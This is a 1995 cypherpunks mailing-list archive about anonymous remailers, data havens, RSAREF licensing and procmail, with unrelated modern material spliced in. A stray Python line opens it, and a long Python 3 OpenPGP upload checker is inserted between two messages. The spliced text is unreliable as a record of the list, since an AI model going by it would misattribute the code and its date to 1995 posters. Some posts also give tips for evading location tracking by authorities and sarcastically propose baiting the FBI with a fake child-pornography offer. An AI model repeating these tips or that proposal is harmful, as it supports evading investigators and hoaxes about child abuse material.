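    print(claimed_vs_actual(stamped))
```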




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 10 Jan 95 08:47:54 PST
To: cypherpunks@toad.com
Subject: Re: Julf gets some negitive press!!!
In-Reply-To: <Wmc4lKjqRuy3075yn@mirage.skypoint.com>
Message-ID: <199501101646.IAA09037@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


skaplin@mirage.skypoint.com (Samuel Kaplin) writes:

 > bitch Siegel is complaining about net hoods again, ...

 > Such problems are further exacerbated by a computer in
 > Finland called the Anonymous Server, which exists for the
 > sole purpose of laundering computer messages, much like
 > dirty money is laundered through small island nations.

I predicted a while back, that when the time came for a serious
attack by authority types on anonymous remailers, we would see
the term "message laundering" suddenly spring into the public
lexicon.

 > Consequently, if you want to, say, threaten someone with
 > death, your risk of retribution is small, courtesy of the
 > Anonymous Server.

Well, I certainly wouldn't post death threats through Penet. At
the very least, it would threaten the existence of the server,
which is a valuable net.resource, and cause me to receive nasty
mail from Julf.  I think Bitch Siegel exaggerates the potential
danger of this particular system.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Harris Baumstein <avi@clas.ufl.edu>
Date: Tue, 10 Jan 95 06:18:11 PST
To: cypherpunks@toad.com
Subject: Re: Data Haven problems
In-Reply-To: <199501100125.TAA29250@pentagon.io.com>
Message-ID: <199501101418.JAA08782@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain


dfloyd@io.com writes:

>My problem is not that people will bitch about my DH.  My problem will
>be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
>making a long report how I cater to p*dofiles and other evil denizens
>that pop from time to time.  Then, I get the police knocking at my
>door, asking me to come to Club Fed for a looooonnnggg vacation.

well i remember a suggestion a while back to only accept encrypted
files. i don't remember who made the suggestion, but this seems like a
good idea for several reasons:

1) most journalists won't know how to encrypt their files (ok, this is
an admittedly short-term advantage, as journalists get smarter)

2) you will have no idea *what* is stored, and absolutely no way of
finding out, even if you wanted to. you should advertise this feature
widely. 

3) it will help promote the use of crypto, as those who want to use
the DH will have to have a way to encrypt their files.

and charging, even an extremely minimal fee, will help to reduce
wanton usage. but then you get into the whole electronic payment
infrastructure problem again...

-avi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 10 Jan 95 09:33:17 PST
To: cypherpunks@toad.com
Subject: Anarcho-Cap - Newt and Gorby?
Message-ID: <199501101733.JAA21222@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


##
From: sherbock@remailer.net

-----BEGIN PGP SIGNED MESSAGE-----

Crypto-anarchy, many-to-many communications, inter-
national/cultural communications, bandwidth price plummet,
computer ubiquity, philosophical/ideological evangelism, freedom
of speech/trade/association and other factors talked about on
this list are together heralding huge transformations.  With
this as background together with the statement that I am somewhat
of a "Frissell/Sandforth Optimist," let me present a short essay
and ask a single political question.

I want to propose that a change to more of a Snow Crash society
with anarcho-capitalism as the norm is not necessarily being
_caused_ by pressures listed above, but, rather, fits a grander
historical destiny.  What we are seeing and will see in the
information age has been bound to happen all along.  It is an
inevitable follow-on phase to our industrial age.  One way to
view our (Cypherpunks) work is "lead, follow or get out of the
way."  What's happening is going to happen.  I just want to be
in the center of it!  (I could write much more in support of
this.  Read Gilder, Rees-Mogg, etc. and much of the techno
Sci-Fi suggested by Cypherpunks.)

Hindsight is 20/20.  Many experts have analyzed the collapse of
the USSR.  Many are quick to claim that the dissolution was
inevitable, historical, even.

Consider the possibility that the dissolution of large,
centralized federal republics is also inevitable.  (The
Frissell/Sandforth Optimists have been arguing this exact point.)

As an interesting specific, consider parallels in the roles of
former Soviet leader Mikhail Gorbachev and the U.S. House Speaker
Newt Gingrich.

Gorbachev, by self-proclamation, was a communist first and
foremost.  He was in no way a destructionist.  In fact, it can be
argued that he never intended to weaken the central power of the
Supreme Soviet.  He introduced liberalization reform
(parestroika?) with the intent only of heading off the foreboding
economic collapse of his State.  Gorbachev's reforms were little
baby walking steps in a direction that the Bear already was
poised to _run_.

Mr. Gingrich is a REPUBLICan.  From what I can see, he loves the
Constitutional government process of the United States.  His
proclaimed intentions are for downsizing and deregulation.
However, he does not seem to desire the dissolution of federal,
central government.  He has not openly claimed to be
libertarian or anarcho-capitalistic.  :)

Will Newt's deregulatory reforms be baby walking steps in the
direction Uncle Sam (and the world) is already poised to _run_?

G. del Sherbock


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBNAy8RoncAAAECAK5jkuO+3qNE4veGXrwKqgJs9GhJibpNBOOacLN/OueiDX4R
w0+fvCNCwIGT49T6acJvgSb/Kej3BcJViw4fkRUABRG0D0cuIGRlbCBTaGVyYm9j
aw==
=RPy1
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLxKvjAXCVYsOH5EVAQEXHQH+IT6n/vth2UcQrhJ9faEn8nfwU/XA/OyL
3qfXso1b7/NoivfSiuAvI8wQHasXQsWOheSwTE9c/TI7w6gAX4Yltw==
=TJqU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Tue, 10 Jan 95 07:37:43 PST
To: cypherpunks@toad.com
Subject: Re: Rumored CBS "hit" on internet coming
In-Reply-To: <199501091955.LAA07671@netcom18.netcom.com>
Message-ID: <y5g4lKJXYLEI075yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <199501091955.LAA07671@netcom18.netcom.com>, you wrote:
> 
> Argghh!! When Connie interviewed me last week, she said I could
> _whisper_ some dark uses to her and it would just be between the two
> of us!
> 
> Life's a bitch, and so is Connie.

I believe the current PinC expression should be
        Life's a Hillary, and so is Connie


- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 10 Jan 95 10:11:37 PST
To: cypherpunks@toad.com
Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to PressRelease)
Message-ID: <199501101810.KAA26946@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


I've been waiting for this, for oh, about two years now.

Eric
-----------------------------------------------------------------------------

RSA Licenses Commercial Distribution Rights to RSAREF
=====================================================
  RSA announces that it is licensing commercial distribution
  rights of its RSAREF software to Consensus Development, allowing
  for implementation of commercial Privacy Enhanced Mail (PEM)
  applications.


Press Release
--------------
  REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security,
  Inc. and Consensus Development Corporation jointly announce today
  at the RSA Data Security Conference that Consensus Development is
  licensing the commercial distribution rights of RSAREF from RSA
  Data Security.

  RSAREF (pronounced "R.S.A. reff") is short for "RSA reference
  implementation" and is a cryptography source code toolkit designed
  to allow developers to create PEM (Privacy-Enhanced Mail) software
  and other encryption/authentication tools. Until now, RSAREF has
  been an unsupported RSA product approved for use only as part of
  freeware and not-for-profit software applications.

  Consensus Development will now be able to market and license RSAREF
  to commercial software developers, and provide software support and
  future enhancements to the RSAREF source code library.

  (continued in full text press release...)


Full Text
---------
  A World-Wide-Web/Mosaic page for this press release can be found at:
    <URL=http://www.consensus.com:8300/RSAREF-PR.html>

  A digitally signed text copy of this press release can be found at:
    <URL=ftp://ftp.consensus.com/pub/consensus/pr/RSAREF-PR.txt>


Discussion/Announcement List
----------------------------
  Consensus Development will be creating an email discussion list for
  software developers interested in RSAREF. To join the discussion,
  send a message to <listproc@consensus.com> with the body of the
  message requesting "subscribe RSAREF-DEV-L firstname lastname".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Tue, 10 Jan 95 08:51:29 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Haven problems
In-Reply-To: <199501101418.JAA08782@cutter.clas.ufl.edu>
Message-ID: <Pine.3.89.9501101025.B12534-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, Avi Harris Baumstein wrote:

> dfloyd@io.com writes:
> 
> >My problem is not that people will bitch about my DH.  My problem will
> >be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
> >making a long report how I cater to p*dofiles and other evil denizens
> >that pop from time to time.  Then, I get the police knocking at my
> >door, asking me to come to Club Fed for a looooonnnggg vacation.
> 
> well i remember a suggestion a while back to only accept encrypted
> files. i don't remember who made the suggestion, but this seems like a
> good idea for several reasons:
>
I like this too, it keeps the data safe not only in transit, but also on 
the site itself.  So I don't have to re-encrypt files, they are already 
crypted, and signed (another good bonus) by the sender or account holder.
 
> 2) you will have no idea *what* is stored, and absolutely no way of
> finding out, even if you wanted to. you should advertise this feature
> widely.

depends on how it is encrypted, if they encrypt it to the datahaven, 
using your public key, that argument won't work, BUT if they are using it 
as an anon drop box, then they can encrypt it to another public key of the 
recipient (an anon key of course) and you would never be able to read it.  
This is a good feature of a data-haven, one that may be able to produce 
profit in the future if that is a motive.
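
An intake check for the "only accept encrypted files" policy discussed in this thread, including the distinction drawn above between files encrypted to the haven's own key and files encrypted to someone else's. This is an added example, not code from the thread; the key IDs, sample message and function names are constructed, and it reads only the OpenPGP packet headers.

```python
import base64

PKESK, SKESK, SED, SEIPD = 1, 3, 9, 18   # OpenPGP packet tags


def dearmor(data):
    """Return binary packet data, decoding ASCII armor if present (CRC unchecked)."""
    if not data.lstrip().startswith(b"-----BEGIN PGP MESSAGE-----"):
        return data
    lines = data.strip().splitlines()
    blank = next((i for i, l in enumerate(lines) if not l.strip()), None)
    if blank is None:
        raise ValueError("armor headers not terminated by a blank line")
    b64 = []
    for line in lines[blank + 1:]:
        if line.startswith((b"=", b"-----END")):
            break                          # CRC-24 line or end marker
        b64.append(line.strip())
    return base64.b64decode(b"".join(b64), validate=True)


def read_packets(buf):
    """Yield (tag, body); body is None when the packet streams to end of file."""
    pos = 0
    while pos < len(buf):
        ctb = buf[pos]
        pos += 1
        if not ctb & 0x80:
            raise ValueError("not an OpenPGP packet header")
        if ctb & 0x40:                     # new-format header
            tag = ctb & 0x3F
            first = buf[pos]
            pos += 1
            if first < 192:
                length = first
            elif first < 224:
                length = ((first - 192) << 8) + buf[pos] + 192
                pos += 1
            elif first == 255:
                length = int.from_bytes(buf[pos:pos + 4], "big")
                pos += 4
            else:                          # partial body lengths
                yield tag, None
                return
        else:                              # old-format header (PGP 2.x)
            tag = (ctb >> 2) & 0x0F
            ltype = ctb & 0x03
            if ltype == 3:                 # indeterminate length
                yield tag, None
                return
            size = (1, 2, 4)[ltype]
            length = int.from_bytes(buf[pos:pos + size], "big")
            pos += size
        if pos + length > len(buf):
            raise ValueError("truncated packet")
        yield tag, buf[pos:pos + length]
        pos += length


def classify_upload(data, haven_key_ids):
    """Return (accepted, reason); haven_key_ids is a set of 8-byte key IDs."""
    try:
        packets = list(read_packets(dearmor(data)))
    except (ValueError, IndexError) as exc:    # includes bad base64
        return False, "not parseable as OpenPGP: %s" % exc
    if not packets:
        return False, "empty upload"
    recipients = []
    for tag, body in packets[:-1]:
        if tag == PKESK:
            if len(body) < 10:
                return False, "malformed session-key packet"
            recipients.append(body[1:9])       # version | key ID (8) | algorithm
        elif tag != SKESK:
            return False, "unexpected packet tag %d before ciphertext" % tag
    if packets[-1][0] not in (SED, SEIPD):
        return False, "no encrypted data packet (last tag %d)" % packets[-1][0]
    if any(kid in haven_key_ids for kid in recipients):
        return False, "encrypted to the haven's own key; operator could decrypt"
    if not recipients:
        return True, "passphrase-encrypted; no public-key recipient"
    return True, "encrypted to %d key(s), none held by the haven" % len(recipients)


# --- constructed sample data (not real keys or messages) ---
HAVEN_ID = bytes.fromhex("A1B2C3D4E5F60718")
RECIPIENT_ID = bytes.fromhex("1122334455667788")


def old_packet(tag, body):
    """Build an old-format packet with a one-octet length (body < 256 bytes)."""
    return bytes([0x80 | (tag << 2), len(body)]) + body


def sample_message(key_id):
    pkesk = b"\x03" + key_id + b"\x01" + b"\x00\x08\xab"   # v3, key ID, RSA, tiny MPI
    return old_packet(PKESK, pkesk) + old_packet(SED, bytes(range(32)))


def armor(binary):
    return (b"-----BEGIN PGP MESSAGE-----\nVersion: 2.6.2\n\n"
            + base64.encodebytes(binary) + b"=AAAA\n-----END PGP MESSAGE-----\n")
```

The check shows only that an upload is framed as an encrypted OpenPGP message and which key IDs it names; it cannot show that the bytes inside the data packet are really ciphertext.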





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RGRIFFITH@sfasu.edu
Date: Tue, 10 Jan 95 08:52:58 PST
To: cypherpunks@toad.com
Subject: procmail: another question
Message-ID: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Please excuse my ignorance, but will procmail run under DOS?  Will it
download mail from a PopMail server?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 10 Jan 95 07:59:27 PST
To: db@Tadpole.COM
Subject: Re: for-pay remailers and FV
In-Reply-To: <21043.789692792.1@nsb.fv.com>
Message-ID: <Yj4eu470Eyt5AxI4Vq@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from fv: 9-Jan-95 Re: for-pay remailers and FV db@Tadpole.COM (2073*)

> Also, there is no reason on earth to take FV for payment under
> such a scheme,

No reason on Earth?  Try any of the following:

1.  You can actually get paid, in real money, using a system that is
operating NOW. 

2.  It requires no special software for the user of the remailer
service, thus preserving a very positive feature of most of today's
anonymous remailers.

3.  You don't need to have a credit card merchant account (and the
technical arrangements for using it) in order to run a remailer service.

There are more, but those are probably the top three.

> I don't see any reason to get FV involved, unless one were so lame 
> as to be unable to get signed up directly with the credit card 
> companies as a merchant -- a process of appropriate complexity
> to indicate the possession of at least one (1) clue, which is prob.
> desirable in someone who's going to be handling remailer finances

Well, I could be wrong, but from the above paragraph I can only infer
that you've never actually tried to set yourself up as a merchant.

The hardest part is getting approved for a merchant account.  Unless you
already have an established business or money in the bank, this will
*probably* be a showstopper if you want to set up a remailer-for-pay
service.  Getting a merchant account is never trivial, and getting one
in a whole new industry is VERY hard.

Once you have a merchant account, establishing the right technical setup
to do the actual authorization and purchases is not rocket science, but
it certainly requires more than "1 clue" -- in particular, it typically
requires hooking up some special hardware, installing and configuring
some new software, and some serious thought about the implications for
your system's security.

None of this is needed if you use FV.

Also, as Paul pointed out, the requirement for reversibility applies to
ANY credit-card-based service, not just FV.  This is NOT an option, it
is required by law (reg Z).

Excerpts from fv: 10-Jan-95 Re: for-pay remailers and FV
Hal@shell.portal.com (2603)

> Perhaps you could charge some small amount for them, but require VISA
> payment, and check the names on the VISA cards.  (This doesn't hurt
> anonymity when the tokens are actually used because of the blinding.)  To
> get multiple tokens a person would have to commit some serious real world
> name trickery, a considerably higher barrier than making up a pseudonym
> on the net.

This is workable.  It also reinvents a big chunk of what FV does, if you
do it yourself. -- NB




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 10 Jan 95 11:27:40 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: procmail: another question
In-Reply-To: <199501101826.NAA15838@hermes.bwh.harvard.edu>
Message-ID: <Pine.3.89.9501101110.A28938-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, Adam Shostack wrote:
> 	Procmail is a very versatile, relatively easy to use way of
> processing mail.

"Relatively easy"  -- Relative to the usual venomous Unix 
user hostile interface that is.   I use procmail, but my 
local Unix guru does not, even though he has a clear need to do so.

>  Its most obvious function is to put mailing lists
> into one or several folders, but it also can be made into a file
> server*, automatically retrieve PGP keys, act as a basic remailer,
> etc, etc.

The .procmailrc file is in effect a program, rather than
a bunch of flags.

Every time procmail receives a message it interpretively 
executes this program, which does a pattern match on the mail, if
it gets a match, passes the mail to some external program,
which may be yet another invocation of procmail executing
a different .rc file.

Now if us windows folk had done it, we would have done
it as visual basic controls and we would have created
an installation program.  Still I must 
confess, we windows folk have not done it and the unix folk have
done it, so I guess it is score 1 for unix, 0 for
windows.

But I guarantee the chairman of the board is not going
to use procmail.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we    James A. Donald
are.  True law derives from this right, not from    http://nw.com/jamesd/
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Tue, 10 Jan 95 11:25:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press
Message-ID: <v02110100ab388eaa8123@[198.68.251.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 1/10/95, Adam Shostack wrote:
>        It's just another example of RSADSI trying to act more like a
>government agency. :)

I hope not -- one thing that I'm trying to do by taking over support for
RSAREF is make it much more responsive to what developers demand. Like you
I was disappointed by the slow progress of RSAREF, so that is why I worked
so hard to get this deal going.

------------------------------------------------------------------------
...Christopher Allen                  Consensus Development Corporation..
...<ChristopherA@consensus.com>                   4104-24th Street #419..
...                                        San Francisco, CA 94114-3615..
...                                        o415/647-6383  f415/647-6384..
...Mosaic/WWW Home Page:                                               ..
...Consensus Home Page    ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 10 Jan 95 08:29:28 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: HTTP and ID Verification
Message-ID: <199501101629.LAA05969@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can anyone tell me what the URL for the site that displays all
the identifying info it gets when you request it is?



- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:30:24 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <Yj4eu470Eyt5AxI4Vq@nsb.fv.com>
Message-ID: <m0rRjZU-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 10 Jan 1995 10:57:56 -0500 (EST)
   From: Nathaniel Borenstein <nsb@nsb.fv.com>

   The hardest part is getting approved for a merchant account.

I've tried.  Nathan is right.

   Also, as Paul pointed out, the requirement for reversibility applies to
   ANY credit-card-based service, not just FV.  This is NOT an option, it
   is required by law (reg Z).

But if you sell services or information, this is not a really big
problem.  You just say "fuck it, I got screwed", and you reverse the
charges.

And as for anonymity/privacy, if the business is doing a lot of other
transactions, and the remailer ones are mixed in, then who's to say
who's who?  Maybe it's time to remind people that there is no such
thing as perfect security, only varying degrees of such.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:34:48 PST
To: cypherpunks@toad.com
Subject: DH testing
Message-ID: <m0rRjdn-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


A DataHaven is only as good as it's been tested.  You could pay for a
tiger team to attack it, but why bother?  Just take some nudie
pictures of a girl >=18 years old who looks <18 years old, announce
publicly that you have kiddie porn for sale, sit back and let the FBI
test your DH for free.  Be sure to charge enough for your eventual
legal defense...

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:42:02 PST
To: cypherpunks@toad.com
Subject: "safe" Internet access
Message-ID: <m0rRjkq-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to access the Internet in a way that doesn't reveal your
physical location (much), buy access from Metricom.  They sell
Internet access via radios.  A small part-15 (900Mhz) $500 radio modem
is needed, plus a few dozen bucks/month (thereabouts).  If you use a
yagi antenna, that will reduce your emissions to mostly one direction.
If you're in line-of-sight with one of their poletops, you can point a
telescope in that direction, and transmit only when you *don't* see a
truck bristling with antennas.  Every radio has a serial number, and
they record who's got what, so they could cut you off much, much
easier than catching you.

For more information, see <http://www.metricom.com>.

Same thing can be done with radiomail, but the speed is slower and the
radios and service are more expensive.  And, they can still cut you off.

Of course, part-time connectivity is problematic, because you need to
receive mail at all times.  Of course, you could use a mail hub in a
"safe" country, but then you're tied to a government again.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 10 Jan 95 13:07:42 PST
To: nelson@crynwr.com (Russell Nelson)
Subject: Re: "safe" Internet access
In-Reply-To: <m0rRjkq-0008ZFC@crynwr.crynwr.com>
Message-ID: <m0rRlfc-0004IkC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Of course, part-time connectivity is problematic, because you need to
> receive mail at all times.  Of course, you could use a mail hub in a
> "safe" country, but then you're tied to a government again.

If you batch your email and news using UUCP, you don't need to be connected
all the time.  And it can also be encrypted...
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jef Poskanzer <jef@ee.lbl.gov>
Date: Tue, 10 Jan 95 11:58:51 PST
To: "Bradley W. Dolan" <71431.2564@compuserve.com>
Subject: Re: Why is WELL down?
Message-ID: <199501101958.LAA07295@hot.ee.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


>My favorite net access provider, the WELL, is down and I can't
>get a straight answer from the normally frank WELL folks why.

Is that sarcasm?

"Never attribute to malice what can be explained by simple stupidity."
---
Jef




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 10 Jan 95 13:18:28 PST
To: cypherpunks@toad.com
Subject: MEETING: Jan. 14th Bay Area Cypherpunks Meeting
Message-ID: <ab3820b50302100417b7@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCEMENT
============

This month's Bay Area Cypherpunks Meeting will be held this Saturday,
January 14th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris, the
usual place and time. Detailed directions are at the end of this message.

The topic:

                        Demonstrations

The emphasis will be on hands-on, live demonstrations of items of interest.
Several speakers will demonstrate products and tools on actual machines.

I encourage eating, shmoozing, and general milling-around to be finished by
12:30 at the latest, so we can start discussion of general items, updates,
etc. I'd really like to get the demos started by 1 p.m., and 1:30 at the
latest. We have a lot of demos planned and some special visitors in town
this week, and some special events that just happened. So, as I'm the
rotating chairentity this month, I'll wield the gavel ruthlessly.

The RSA Data Security Inc. annual conference happened this past week, so I
expect several folks will want to provide updates and news announcements,
e.g., the licensing of RSAREF, status of lawsuits, new results, etc.. Short
updates are good, but we just don't have the time for this meeting to
formally present recaps of interesting papers. If there were any *amazing*
results, they'll surely keep for a future meeting for more detailed
discussion (could be a theme for a meeting).

Also, Phil Zimmermann may be at the meeting (he's scheduled), so hearing
from him could easily soak up a couple of hours, which we just don't have.
In fairness to those who've planned demos, we'll have to try to limit all
these interesting folks to the first hour or so. Maybe a few minutes more.
And maybe later in the day there'll be time.

We have these demos planned.

* Henry Strickland (Strick) will, in his words, "be demoing Skronk
(transparent above-the-kernel encryption for TCP/IP) and Kudzu (the TCL
toolkit)."

* Jack Repenning of SGI will demo two interfaces. In his own words, "I'm
planning to demo two interfaces, actually: the Emacs one (on an Indy),
and the MCIP "MacPGP Kit" plus Eudora extensions, on a Mac."

* Phil Zimmermann "will demo pgp 2.9 and possibly voice pgp," according to
Katy Kislitzin, who is in contact with Phil.

* Katy Kislitzin will bring up the "demo smosaic" she has. (Secure Mosaic.)

* Raph Levien will demonstrate "premail," his remailer-chaining tool.

* Other ad hoc demos of items of interest may happen. We'll have several
machines set up, so those with interesting software or hardware can perhaps
do some brief, unscheduled demos.

If I left anyone out, anyone who sent me e-mail saying they wanted to demo,
I apologize. I went back over my mail and these were the folks I found
who'd sent me e-mail.

Contact me at my normal e-mail address (tcmay@netcom.com) as soon as
possible if you want to be added. (I'll be travelling to LA on Friday, for
a television interview with the BBC on crypto, and so will be unwired that
day.)

The emphasis is on hands-on demos, to expose folks to tools,
capabilities, possible future products. Informality is fine.

NOTE TO PRESENTERS: Make arrangements to have machines you'll need there.
An SGI Unix machine is permanently in the room. Other machines will have to
be brought. Because of my trip to LA on Friday, I doubt I'll be bringing my
PowerMac 7100AV with me, but I will have a PowerBook 170 laptop Macintosh,
if all else fails. Windows and DOS demo folks should bring their machine of
choice.

(Atari, Cromemco, Amiga, Altair, and Exidy Sorcerer users are of course on
their own.)

The overhead video system is often more trouble than it's worth, but it will
be available for at least some of the demos. Those wishing to tie into it
should have either RGB outputs from their machine, or NTSC composite video.
I'll bring my Hi-8 camcorder, which can tie in, and thus allow me to zoom
in on whatever machines are there and display the video on the overhead
screen.

Dinner plans will, as usual, be made in the last chaotic moments of the meeting.

-----------------------------------------------------------------------------
DIRECTIONS:

  Silicon Graphics, Inc.
  Building 5 (SGI Cafeteria)
  2025 North Shoreline Boulevard
  Mountain View, CA

From 101 take Shoreline East.  This is towards Shoreline Amphitheatre.
It's also "logical east", and points more north than east.  (That is,
it's east with respect to 101 North, which points west near the exit.)
If you're coming in on 101 South, you'll cross over the bridge.

Continue on Shoreline and go past a whole bunch of other SGI
buildings.  Turn right onto Steirlin Court at the big red metal
sculpture.  There will be even more SGI buildings surrounding
you--take note of the building numbers.  Go almost to the end of this
street.  Building 5 is on the right.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 10 Jan 95 10:19:52 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press
In-Reply-To: <199501101810.KAA26946@largo.remailer.net>
Message-ID: <199501101821.NAA15802@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	It's just another example of RSADSI trying to act more like a
government agency. :)

Adam


| I've been waiting for this, for oh, about two years now.
| 
| Eric
| -----------------------------------------------------------------------------
| 
| RSA Licenses Commercial Distribution Rights to RSAREF
| =====================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 10 Jan 95 10:23:52 PST
To: RGRIFFITH@sfasu.edu
Subject: Re: procmail: another question
In-Reply-To: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU>
Message-ID: <199501101826.NAA15838@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


You wrote:

| Please excuse my ignorance, but will procmail run under DOS?  Will it
| download mail from a PopMail server?

	Procmail will run on the UNIX system that you connect to via
pop.  It processes mail, it doesn't transport it.  (It can, of course,
hand mail off to an MTA.)

	Procmail is a very versatile, relatively easy to use way of
processing mail.  Its most obvious function is to put mailing lists
into one or several folders, but it also can be made into a file
server*, automatically retrieve PGP keys, act as a basic remailer,
etc, etc.


Adam

*RTFM: procmailex(5)

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John.Schofield@sprawl.expressnet.org (John Schofield)
Date: Tue, 10 Jan 95 21:18:55 PST
To: cypherpunks@toad.com
Subject: Keep Out Electronic Availability Announcement
Message-ID: <4bc_9501101432@expressnet.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

                               Keep Out
                  The Journal of Electronic Privacy
                           January 10, 1995


    ** Keep Out Volume 1, Number 2 now available electronically **
